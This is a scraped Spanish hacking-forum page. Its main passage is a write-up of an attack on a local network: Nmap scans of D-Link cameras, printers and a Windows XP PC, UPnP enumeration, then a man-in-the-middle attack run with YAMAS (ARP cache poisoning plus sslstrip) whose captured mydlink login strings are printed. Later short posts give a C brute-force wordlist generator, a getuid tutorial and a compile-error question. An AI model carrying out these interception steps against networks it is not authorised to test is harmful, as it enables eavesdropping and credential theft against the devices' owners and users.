help             Top level CLI help
igmp             igmp configuration commands
imdebug          Directly access the information model
ip               Configure IP router
lan             
logger           Log to a remote host using syslog
meter            Packet metering configuration command
nat              NAT configuration commands
port             Physical port configuration commands
pppoa            PPP over ATM configuration
pppoe            PPP over Ethernet Configuration
reboot           reboot modem
restore_defaults set all configuration to factory setting
rfc1483          Commands to configure RFC1483 transports
save_and_exit    SAVES changes closing telnet session
save_and_reboot  SAVES changes and reboots modem.
save_config      Save configuration
scheduler        Configuration commands for scheduler
security         Security configuration commands not specific to NAT or firewall
simpleconfig     SimpleConfig Configuration commands
sntpclient       Simple Network Time Protocol Client commands
stop             
system           System administration commands
transports       Transport configuration commands
upnp             UPnP configuration commands
user             User commands
wanacl           snmp remote management
webserver        Webserver configuration commands
wpa              Configure WPA (Wireless Protected Access)
zipb             Configure Dynamic ZIPB mode
-->
Vaya... parece que se pueden hacer un par de cosas...
Pasemos a las camaras!

CAMARAS

Cuando intentamos acceder a alguna de las camaras por el puerto designado en la tabla del NAT se abre una ventana como esta solicitandonos un user y una pass.



Al no introducirla correctamente nos redirige a la siguiente pagina:



El siguiente paso es realizar un escaneo completo de las cámaras con Nmap.

CAMARA 1 IP 192.168.1.12

Según parece esta camara está offline, esto puede deberse a muchos motivos, que se estropeara, que la quitaran por decisión propia... La descartamos.

CAMARA 2 IP 192.168.1.13

Starting Nmap 5.61TEST4

Nmap scan report for 192.168.1.13
Host is up (0.0076s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     GNU Inetutils FTPd 1.4.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
554/tcp  open  rtsp?
| rtsp-methods:
|_  OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN
1501/tcp open  sas-3?
MAC Address: 00:13:46:DB:B7:5C (D-Link)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:kernel:2.4
OS details: Linux 2.4.18 - 2.4.35 (likely embedded)
Network Distance: 1 hop
Service Info: Host: Network-Camera

TRACEROUTE
HOP RTT     ADDRESS
1   7.56 ms 192.168.1.13

CAMARA 3 IP 192.168.1.14

root@bt:~# nmap -sV -A 192.168.1.14

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.14
Host is up (0.28s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     GNU Inetutils FTPd 1.4.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp  open  telnet  Openwall GNU/*/Linux telnetd
554/tcp open  rtsp?
| rtsp-methods:
|_  OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN
MAC Address: 00:13:46:DC:2D:60 (D-Link)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:kernel:2.4
OS details: Linux 2.4.18 - 2.4.35 (likely embedded)
Network Distance: 1 hop
Service Info: Host: Network-Camera; OS: Linux

TRACEROUTE
HOP RTT       ADDRESS
1   281.05 ms 192.168.1.14

CAMARA 4 IP 192.168.1.15

root@bt:~# nmap -sV -A 192.168.1.15

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.15
Host is up (0.11s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE   VERSION
21/tcp   open  ftp       GNU Inetutils FTPd 1.4.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp   open  telnet    Openwall GNU/*/Linux telnetd
554/tcp  open  rtsp?
| rtsp-methods:
|_  OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN
1503/tcp open  imtc-mcs?
MAC Address: 00:1C:F0:78:81:83 (D-Link)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:kernel:2.4
OS details: Linux 2.4.18 - 2.4.35 (likely embedded)
Network Distance: 1 hop
Service Info: Host: Network-Camera; OS: Linux

TRACEROUTE
HOP RTT       ADDRESS
1   113.45 ms 192.168.1.15

CAMARA 5 IP 192.168.1.16

Host is up (0.27s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
443/tcp open  ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after:  2015-02-04 08:14:40
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
| http-title: Document Error: Unauthorized
|_Requested resource was https://192.168.1.16:443/home.htm
MAC Address: F0:7D:68:05:A6:D0 (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   271.54 ms 192.168.1.16

CAMARA 6 IP 192.168.1.17

root@bt:~# nmap -sV -A 192.168.1.17

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.17
Host is up (0.34s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
443/tcp open  ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after:  2015-02-04 08:14:40
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
| http-title: Document Error: Unauthorized
|_Requested resource was https://192.168.1.17:443/home.htm
MAC Address: F0:7D:68:0A:87:5A (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   336.91 ms 192.168.1.17

CAMARA 7 IP 192.168.1.18

nmap -sV -A 192.168.1.18

Starting Nmap 5.61TEST4 ( http://nmap.org )
Nmap scan report for 192.168.1.18
Host is up (0.34s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
443/tcp open  ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after:  2015-02-04 08:14:40
|_http-title: Requested resource was https://192.168.1.18:443/home.htm and no page was returned.
MAC Address: F0:7D:68:0A:87:49 (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   338.75 ms 192.168.1.18

CAMARA 8 IP 192.168.1.19

root@bt:~# nmap -sV -A 192.168.1.19

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.19
Host is up (0.66s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
443/tcp open  ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after:  2015-02-04 08:14:40
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
| http-title: Document Error: Unauthorized
|_Requested resource was https://192.168.1.19:443/home.htm
MAC Address: F0:7D:68:0A:86:C8 (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   655.43 ms 192.168.1.19

CAMARA 9 IP 192.168.1.20

root@bt:~# nmap -sV -A 192.168.1.20

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.20
Host is up (0.36s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
443/tcp open  ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after:  2015-02-04 08:14:40
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
| http-title: Document Error: Unauthorized
|_Requested resource was https://192.168.1.20:443/home.htm
MAC Address: F0:7D:68:0A:85:4B (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   360.67 ms 192.168.1.20

Una vez escaneadas las camaras escaneamos el resto de IPs para hacernos una idea de que otros equipos hay en la WLAN.

192.168.1.33 IMPRESORA HP

root@bt:~# nmap -sV -A 192.168.1.33

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:10 CEST
Nmap scan report for 192.168.1.33
Host is up (0.0045s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Virata-EmWeb 6.2.1
|_http-title: HP Photosmart Wireless B109n-z
139/tcp  open  tcpwrapped
445/tcp  open  netbios-ssn
6839/tcp open  tcpwrapped
7435/tcp open  tcpwrapped
8080/tcp open  http-proxy?
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
9100/tcp open  jetdirect?
9101/tcp open  jetdirect?
9102/tcp open  jetdirect?
9110/tcp open  unknown
9220/tcp open  hp-gsg      HP Generic Scan Gateway 1.0
9290/tcp open  hp-gsg      IEEE 1284.4 scan peripheral gateway
9500/tcp open  ismserver?
MAC Address: F4:CE:46:EE:2C:E2 (Hewlett-Packard Company)
Device type: printer
Running: HP embedded
OS details: HP PhotoSmart C390 or C4780, or Officejet 7000 printer, HP printer: Photosmart 4300-, 6500-, 7200-, or 8100-series, or Officejet 6000-series
Network Distance: 1 hop
Service Info: Device: printer

Host script results:
|_nbstat: NetBIOS name: HPF4CE46EE2CE2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>

TRACEROUTE
HOP RTT     ADDRESS
1   4.55 ms 192.168.1.33

192.168.1.34 PC

root@bt:~# nmap -sV -A 192.168.1.34

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.34
Host is up (0.0029s latency).
Not shown: 990 filtered ports
PORT     STATE  SERVICE      VERSION
21/tcp   open   tcpwrapped
139/tcp  open   netbios-ssn
427/tcp  closed svrloc
445/tcp  open   microsoft-ds Microsoft Windows XP microsoft-ds
700/tcp  open   tcpwrapped
1073/tcp open   tcpwrapped
2869/tcp open   http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
6000/tcp open   X11?
8000/tcp open   http-alt?
8001/tcp open   vcom-tunnel?
MAC Address: 00:10:DC:E4:EE:C0 (Micro-star International CO.)
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|2003|2000 (98%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows XP Professional SP2 (firewall enabled) (98%), Microsoft Windows Small Business Server 2003 (98%), Microsoft Windows XP SP2 (94%), Microsoft Windows 2000 SP4 (93%), Microsoft Windows XP SP3 (93%), Microsoft Windows XP Embedded SP2 (92%), Microsoft Windows XP SP2 or SP3 (92%), Microsoft Windows Server 2003 SP0 or Windows XP SP2 (91%), Microsoft Windows Server 2003 SP1 - SP2 (90%), Microsoft Windows Server 2003 SP1 or SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: JACOBO, NetBIOS user: <unknown>, NetBIOS MAC: 00:10:dc:e4:ee:c0 (Micro-star International CO.)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: Jacobo
|   NetBIOS computer name: JACOBO
|   Workgroup: debo
|_  System time: 2012-06-21 21:22:21 UTC+1

TRACEROUTE
HOP RTT     ADDRESS
1   2.94 ms 192.168.1.34

192.168.1.36 IMPRESORA HP


root@bt:~# nmap -sV -A 192.168.1.36

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:43 CEST
Nmap scan report for 192.168.1.36
Host is up (0.033s latency).
Not shown: 985 closed ports
PORT     STATE SERVICE           VERSION
80/tcp   open  http?
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
139/tcp  open  tcpwrapped
445/tcp  open  netbios-ssn
631/tcp  open  ipp?
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
6839/tcp open  tcpwrapped
7435/tcp open  tcpwrapped
8080/tcp open  http-proxy?
9100/tcp open  jetdirect?
9101/tcp open  jetdirect?
9102/tcp open  jetdirect?
9110/tcp open  unknown
9111/tcp open  DragonIDSConsole?
9220/tcp open  hp-gsg            HP Generic Scan Gateway 1.0
9290/tcp open  hp-gsg            IEEE 1284.4 scan peripheral gateway
9500/tcp open  ismserver?
MAC Address: 9C:8E:99:33:4D:F0 (Hewlett-Packard Company)
Device type: printer|power-device
Running: HP embedded, HP VxWorks, MGE embedded
OS CPE: cpe:/o:hp:vxworks
OS details: HP LaserJet CM1312 or Photosmart C510a printer, VxWorks: HP printer or MGE MX 5000 RT UPS
Network Distance: 1 hop
Service Info: Device: printer

Host script results:
|_nbstat: NetBIOS name: HP9C8E99334DF0, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>

TRACEROUTE
HOP RTT      ADDRESS
1   33.32 ms 192.168.1.36

192.168.1.38

Esta IP no tengo ni la más mínima idea de a que podría pertenecer xD si alguno de ustedes se imaginan de algo me avisais foro hacker xD

nmap -sV -A 192.168.1.38

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:55 CEST
Nmap scan report for 192.168.1.38
Host is up (0.49s latency).
Not shown: 998 filtered ports
PORT     STATE  SERVICE VERSION
2869/tcp closed icslap
2968/tcp open   enpp?
MAC Address: 00:1F:1F:48:55:80 (Edimax Technology Co.)
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows XP|98|2000|NT|2003|PocketPC/CE (94%), HTC Windows PocketPC/CE (91%), Sony Ericsson Symbian OS 9.X (88%), Ness embedded (87%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_98 cpe:/o:htc:windows_ce cpe:/o:microsoft:windows_2000::sp1 cpe:/o:microsoft:windows_nt cpe:/o:microsoft:windows_server_2003 cpe:/o:sonyericsson:symbian_os:9 cpe:/o:microsoft:windows_ce
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows 98 SE (92%), Microsoft Windows XP SP2 (91%), HTC Touch mobile phone (Windows Mobile 6) (91%), Microsoft Windows 98 (91%), Microsoft Windows XP Home SP2 (91%), Microsoft Windows XP Professional SP2 (91%), Microsoft Windows XP SP2 or SP3 (91%), Microsoft Windows 2000 SP1 (90%), Microsoft Windows NT 4.0 SP5 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   486.83 ms 192.168.1.38

Observamos que la MAC del host pertenece a Edimax Technology Co. http://www.edimax.es/es/index.php Basta una búsqueda en internet para averiguar que es una empresa que se dedica a la fabricación de dispositivos Wireless, entre ellos cámaras Wireless. Será otra cámara?

IP 192.168.1.10 ¿OTRO ROUTER?
.

nmap -sV -A 192.168.1.10

Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.10
Host is up (0.0072s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE    VERSION
22/tcp  open  tcpwrapped
23/tcp  open  telnet     D-Link Access Point telnetd
80/tcp  open  tcpwrapped
443/tcp open  tcpwrapped
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=HsinChu/countryName=TW
| Not valid before: 2004-07-12 09:02:20
|_Not valid after:  2024-07-12 09:02:20
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
MAC Address: 00:1B:11:01:30:95 (D-Link)
OS details: WAP (Cisco Aironet 1010, D-Link DWL-2100AP or DWL-3200AP, Linksys WAP51AB or WAP55AG, Netgear WPN824, or Proxim ORiNOCO AP-4000M), Lights-Out remote server management, or ReplayTV 5500 DVR, Enterasys Matrix C1 switch or HP LaserJet 3600 printer
Network Distance: 1 hop
Service Info: Device: router

TRACEROUTE
HOP RTT     ADDRESS
1   7.18 ms 192.168.1.10

Los resultados que obtenemos para esta IP son bastante interesantes, ya que según Nmap parace que nos encontramos frente a otro router. Esto rompería los esquemas que nos habíamos hecho en un principio sobre la composición de la red.

ETHERAPE

Para entender mejor como funciona la red y que hosts se comunican entre sí ejecutamos el Etherape.
Etherape es un programa que básicamente sirve para mapear el recorrido que siguen las comunicaciones en la red para así poder hacernos una idea de la estructura de la misma.

Esto es lo que obtenemos tras un rato ejecutando etherape:



Como se puede ver parece que la IP 239.255.255.250 se comunica constantemente con las IPs de las camaras de seguridad. Esto llama la atención, primero porque en nuestro primer escaneo con Nmap no habíamos detectado ese host, lo que hace pensar que se trata de un host externo a la red (más adelante veremos que esto no es así). Ejecutamos Nmap para intentar escanearlo.

root@bt:~# nmap 239.255.255.250

Starting Nmap 5.61TEST4
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 0.44 seconds

Efectivamente nos da como resultado host down.
Probamos con algo diferente, vamos a realizar un ping a la IP mientras corremos el Etherape para mapear el recorrido de los paquetes.

Esto es lo que obtenemos con Etherape+Ping:






IP 239.255.255.250 MULTIDIFUSIÓN UPnP

Como podemos ver, nosotros estamos mandando paquetes solamente a la IP 239.255.255.250 pero recibimos paquetes de respuesta de las IPs 192.168.1.1 192.168.1.13 192.168.1.14 192.168.1.15 . Esto significa que la IP 239.255.255.250 reenvía nuestros "paquetes de ping" a esas IPs, como puede verse en el mapeado de Etherape. Otro dato interesante es que en algunos paquetes aparece "DUP!", esto quiere decir que el paquete está duplicado, lo que nos indica que nos llegan varias respuestas iguales desde diferentes direcciones, osea, que el paquete que les llega a todos los hosts es el mismo paquete que nosotros envíamos a 239.255.255.250, por eso nos llegan respuestas repetidas.

Si investigamos un poco en internet http://sanmaikelnews.comze.com/?p=66, descubrimos que la ip 239.255.255.250 es una dirección de multidifusión utilizada por el protocolo UPnP. Los dispositivos que ofrecen servicios UPnP envian periódicamente NOTIFICACIONES SSDP al 239.255.255.250:1900, anunciandose a los clientes que están escuchando. Una NOTIFICACION SSDP contiene una cabecera de 'Localización' donde especifica la ubicación de un archivo XML. Este archivo XML contiene datos que indican, entre otras cosas, el tipo (s) de dispositivo UPnP y los servicios soportados por el host, así como rutas adicionales a otros documentos XML que describen los diversos servicios en detalle. Del mismo modo, los clientes UPnP pueden enviar requerimientos SSDP M-SEARCH al 239.255.255.250:1900 para ver si alguno de los dispositivos UPnP responde.

MIRANDA

Auditar dispositivos UPnP de manera manual es un proceso que requiere mucho tiempo y dedicación. Miranda es un script escrito en python que nos permite automatizar y acelerar considerablemente todo este proceso.

Su localización en la suite de backtrack es:

/pentest/enumeration/miranda

Corremos el script miranda.py

Lo primero que necesitamos es encontrar los hosts UPnP que existen en nuestra red:

upnp> msearch

Entering discovery mode for 'upnp:rootdevice', Ctl+C to stop...

****************************************************************
SSDP reply message from 192.168.1.17:8838
XML file is located at http://192.168.1.17:8838/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.16:8156
XML file is located at http://192.168.1.16:8156/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.20:8838
XML file is located at http://192.168.1.20:8838/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.19:8838
XML file is located at http://192.168.1.19:8838/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.1:2800
XML file is located at http://192.168.1.1:2800/WFADevice.xml
Device is running Unknown/0.0 UPnP/1.0 Conexant-EmWeb/R6_1_0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.15:11993
XML file is located at http://192.168.1.15:11993/description.xml
Device is running Embedded UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.18:8838
XML file is located at http://192.168.1.18:8838/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************

****************************************************************
SSDP notification message from 192.168.1.13:10242
XML file is located at http://192.168.1.13:10242/description.xml
Device is running Embedded UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.14:10242
XML file is located at http://192.168.1.14:10242/description.xml
Device is running Embedded UPnP/1.0
****************************************************************

Después listamos los hosts descubiertos:

upnp> host list

   
  • 192.168.1.17:8838
       [1] 192.168.1.16:8156
       [2] 192.168.1.20:8838
       [3] 192.168.1.19:8838
       [4] 192.168.1.1:2800
       [5] 192.168.1.15:11993
       [6] 192.168.1.18:8838
       [7] 192.168.1.13:10242
       [8] 192.168.1.14:10242

    Nos damos cuenta de que son todas las cámaras + el router
    -------------- CAPITULO EN CONSTRUCCIÓN --------------------

    MITM

    Para ejecutar el ataque MITM vamos a utilizar YAMAS, un script que permite automatizar considerablemente el proceso del ataque.

    Para el primer ataque vamos a seleccionar como objetivo toda la red y vamos a redirigir el trafíco de los puertos 80 a ver que encontramos.


    root@bt:~# yamas
    No update available
    Script is installed


                                                                   
         `YMM'   `MM'   db      `7MMM.     ,MMF'      db       .M"""bgd
           VMA   ,V    ;MM:       MMMb    dPMM       ;MM:     ,MI    "Y
            VMA ,V    ,V^MM.      M YM   ,M MM      ,V^MM.    `MMb.     
             VMMP    ,M  `MM      M  Mb  M' MM     ,M  `MM      `YMMNq.
              MM     AbmmmqMA     M  YM.P'  MM     AbmmmqMA   .     `MM
              MM    A'     VML    M  `YM'   MM    A'     VML  Mb     dM
            .JMML..AMA.   .AMMA..JML. `'  .JMML..AMA.   .AMMA.P"Ybmmd"
    ===========================================================================
    =       Welcome to Yet Another MITM Automation Script.                    =
    =       Use this tool responsibly, and enjoy!                             =
    =       Feel free to contribute and distribute this script as you please. =
    =       Official thread : http://tinyurl.com/yamas-bt5                    =
    =       Check out the help (-h) to see new features and informations      =
    =       You are running version 20120213                            =
    ===========================================================================
    Message of the day :
      Reviewing some code...
    Could someone send me a complete log file? I'm planning on making a better parsing.
    On another note, I today had the privilege to witness that Yamas works against Youporn mobile. MMD.

    Please make sure to check out my last project : http://msimdb.comax.fr

  • Cleaning iptables
    [-] Cleaned.

  • Activating IP forwarding...
    [-] Activated.

  • Configuring iptables...
    To what port should the traffic be redirected to? (default = 8080)

    Port 8080 selected as default.

    From what port should the traffic be redirected to? (default = 80)

    Port 80 selected as default.


    Traffic from port 80 will be redirected to port 8080
    [-] Traffic rerouted

  • Activating sslstrip...
    Choose filename to output : (default = yamas)
    wlan_ed
    Sslstrip will be listening on port 8080 and outputting log in /tmp/wlan_ed.txt

    sslstrip 0.9 by Moxie Marlinspike running...

    [-] Sslstrip is running.


  • Activating ARP cache poisoning...

    Gateway : 192.168.1.1      Interface : wlan0

    Enter IP gateway adress or press enter to use 192.168.1.1.

    192.168.1.1 selected as default.


    What interface would you like to use? It should match IP gateway as shown above. Press enter to use wlan0.

    wlan0 selected as default.


    We will target the whole network as default. You can discover hosts and enter IP(s) manually by entering D.
    Press enter to default.


    Targeting the whole network on 192.168.1.1 on wlan0 with ARPspoof
    [-] Arp cache poisoning is launched.  Keep new window(s) running.

    Attack should be running smooth, enjoy.

    Aquí está el resultado de este primer ataque:

    Website =    prov.eu.mydlink.com):
    Login =    tfQmw7Lw5EAzo1LgDdUkp1vyZCx6XRXyMvi6TA6o7PW5UPCp4Yf5D54cSTQ6xdbpgYT6FsJoqYQdRsXps3Aw88Mm18tsUsMy20T37OboNmy5VdvoavTsWjZ7ro3kF17inCMlV5WggzDjGstwB8gyrw3wRd7mzyY3HTU$
    Website =    prov.eu.mydlink.com):
    Login =    Pw2eMpFln89k4cF6Tcpo6m/6ItsmWvNsMpdlSdj5xyGoQyB6yvhoXjzeFzpvs5+6d6HvrAFibT2tHB0$
    Website =    prov.eu.mydlink.com):
    Login =    4cr6n8hci/evlGheWlo7kGHsQKBmA+ssKu1mUJ938VzjTVa83XNjWfPwCZrmvlR8yXlmEkp3zXrtVks8ebec7gn62gVyTkns1Hlo8FR3GqFjRlH3q7NySr2keaw7VVqnn9s4EGlnsIoyCJe8ZSOtWW+zvI2tcSezZZq$
    Website =    prov.eu.mydlink.com):
    Login =    QkjpNasdssmsvjsxWj/rbvpxQoFqTmakXyVdY32f3pwrIpqxim0rMcanYolwZsqmTjewmw9odpr3cBayEQz$
    Website =    prov.eu.mydlink.com):
    Login =    +en3Kneyp7ht6feaRUwi5f/wHnOoG4mwO9Ro0kF6nbpp9bl5hePpRGNsFrnorU15aeaoSJz6benvDJm5cVhyjFr3YF2c9JrwJxamng16AW9pWU/6tHRlQK+tzSddNbevsfmdQencc4jkEq2iebjlVqqra+wkFqhebbk$
    Website =    prov.eu.mydlink.com):

#65
Programación General / ayuda violacion de segmento?
30 Diciembre 2013, 23:56 PM
  Hola a todos !

Alguien podria ojear este codigo y decirme donde esta la violacion de segmento??


/*DICCIONARIO*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int desde;
int hasta;

char nombre[25];   He suprimido esta variable que estaba duplicada, pero sigue el problema..

void calcula (void);


int main()
{
    int ndopcion;
   
    printf("\n\n\t\t\t\tMENU\n\n");
    printf("\n\t\t1\tNumeroS\n\t\t2\tMayusculaS\n\t\t3\tMinusculaS\n\t\t4\tVaciO\n\t\t5\tVaciO\n");
    printf ("\nIntroduza numero de opcion: ");
    scanf (" %d" ,&ndopcion);
   
        switch (ndopcion)
        {
            case 1:
                    {
                    desde=48;
                    hasta=57;
                        calcula();
                    }
            break;
           
            case 2:
                    {
                        desde=65;
                        hasta=90;
                        calcula();
                       
                        }
            break;
           
            case 3:
                    {
                        desde=97;
                        hasta=122;
                        calcula();
                       
                        }
            break;
           
            case 4:
                    {
                   
                }
            break;
           
            case 5:
            {
                   
                }
            break;
            }
       
        }
   
    void calcula (void)
    {
   
    int a, b, c, d, e, f, g, h;
char clv[8];
char nombre[20];
    printf("\nIntroduzca nombre del archivo de salida: ");
    gets(nombre);


    FILE *hoja1;
    hoja1 = fopen (nombre , "wt");
    if (hoja1 == NULL)
    printf ("No se ha podido crear el fichero");
    else
       
    for (a=desde; a<= hasta; a++)
    {
        clv[0] = a;
        for (b=desde; b <= hasta; b++)
        {
            clv[1] = b;
                for (c=desde; c<= hasta; c++)
            {   
                clv[2] = c;
                for (d=desde; d<= 90; d++)
                {   
                    clv[3] = d;
                        for (e=desde; e<=hasta; e++)
                        {   
                            clv[4] = e;
                            for (f=desde; f<= hasta; f++)
                            {   
                                clv[5] = f;
                                for (g=desde; g<=hasta; g++)
                                {
                                  clv[6] = g;
                                   for(h=desde; h <= hasta; h++)
                                   {
                                       clv[7] = h;
                                     
                                       
                                    fwrite (clv, sizeof(clv), 1, hoja1);
                                   
                       
                               
                             }
                           
                         }
                     }
                  }
               }
            }
        }
    }
    fclose(hoja1);
    printf("\n%s", clv);
    printf("\nArchivo cerrado\n\n ");
}
#66
 Estas funciones como su propio nombre indica, obtienen el UID del usuario, en sistemas Gnu con linux. Más tarde explicare para que se suele usar.

  Echando mano del `man' vemos las estructura de la función:

Código: [Seleccionar]
#include <unistd.h>
#include <sys/types.h>

uid_t getuid(void);
uid_t geteuid(void);

  Tenemos que incluir dichas cabeceras, y como vemos la función retorna un tipo de dato desconocido (por ahora :p), y no hace falta pasarle parámetros. A menudo se suelen poner nombres que nos son desconocidos, para identificar el tipo de dato de una función concreta, por ejemplo el tipo de dato "uid_t" no es más que un entero, pero al tener ese nombre ya nos confunde :p. De ahí que hayamos puesto la cabecera "types.h".

  Ok, ¿ para que podríamos usar esto ?, primero hay que saber que es el uid (si has trabajado alguna vez en sistemas linux lo deberías saber :p). Es el identificador de usuario, un número entero que nos identifica (ejecutar `id -u <USER>' para saber tu id). Donde esta la gracia de esto, pues que el usuario root (superusuario) siempre tendrá como UID el valor 0. Con lo cual si para ejecutar unas tareas en nuestro código necesitamos que el usuario que lo haya lanzado tenga los permisos de root, podemos saber perfectamente si los tiene o no, y en caso contrario mandarle un mensaje indicándoselo.

Código: [Seleccionar]
uid_t uid;         // Declaramos el tipo de dato que contendrá el UID (es un int).
uid = getuid();    // La función retorna el ID del usuario que llamó al proceso.
if(uid != 0){      // Si no es 0 no es root.
  fprintf(stderr,"ERROR: Debes lanzar el programa como \"root\".\n");
  exit(1);
}

  La función geteuid() es parecida a la anterior solo que muestra el id del usuario "efectivo". Con la función anterior tenemos de sobra, esta se usa más para detectar escaladas de privilegios (creo recordar).

  Saludos Att: Nightcode
#67
Programación General / tipos de conflictos en C
30 Diciembre 2013, 23:50 PM
hola foro

les agradezco me ayuden a resolver este error
lo que pienso es que no estoy realizando bien el uso de funciones


Código: [Seleccionar]
funcionTest.c:27:6: error: tipos en conflicto para 'intercambio'
funcionTest.c:2:6: nota: la declaración previa de 'intercambio' estaba aquí
funcionTest.c:36:6: error: tipos en conflicto para 'imprimir'
funcionTest.c:3:6: nota: la declaración previa de 'imprimir' estaba aquí


este es el codigo del programa
Código: [Seleccionar]
#include<stdio.h>
void intercambio(int mitad, int vectorUno, int vectorDos);
void imprimir(int mitad, int vectorUno, int vectorDos);

int main(){
int i,num,mitad;
printf("ingrese el tamaño del vector : ");
scanf("%d",&num);

mitad=num/2;
int vectorNumeros[num];
int vectorUno[mitad];
int vectorDos[mitad];

